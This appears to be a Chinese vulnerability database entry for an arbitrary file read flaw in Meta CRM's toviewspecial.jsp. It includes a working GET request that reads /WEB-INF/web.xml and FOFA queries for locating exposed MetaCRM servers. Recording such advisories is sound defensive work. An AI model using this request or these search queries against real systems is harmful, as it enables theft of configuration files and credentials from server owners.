momo安全漏洞库

多模块数据检索平台

登录 注册
返回列表

美特 CRM /business/common/toviewspecial.jsp 文件读取漏洞

CVE: 暂无
CNVD: 暂无
CNNVD: 暂无
漏洞类型: 暂无
漏洞等级: 暂无
年份: 2026
POC_ID: 94525
漏洞描述
美特CRM系统 toviewspecial.jsp 存在任意文件读取漏洞,攻击者可通过构造恶意请求绕过安全限制,直接读取服务器上的敏感文件(如配置文件、数据库凭证、日志文件等),导致系统信息泄露和进一步安全风险。 GET /business/common/toviewspecial.jsp?view=/WEB-INF/web.xml HTTP/1.1
FOFA 语句
title="MetaCRM" || body="/common/images/login/metacrm.gif" || body="MetaCRM5 loading" || body="Metasoft Co., Ltd."
系统自动生成,仅供参考
影响范围
美特CRM
漏洞详情
POC: 已公开
漏洞 POC
登录后可查看漏洞 POC。请先 登录注册
修复建议
暂无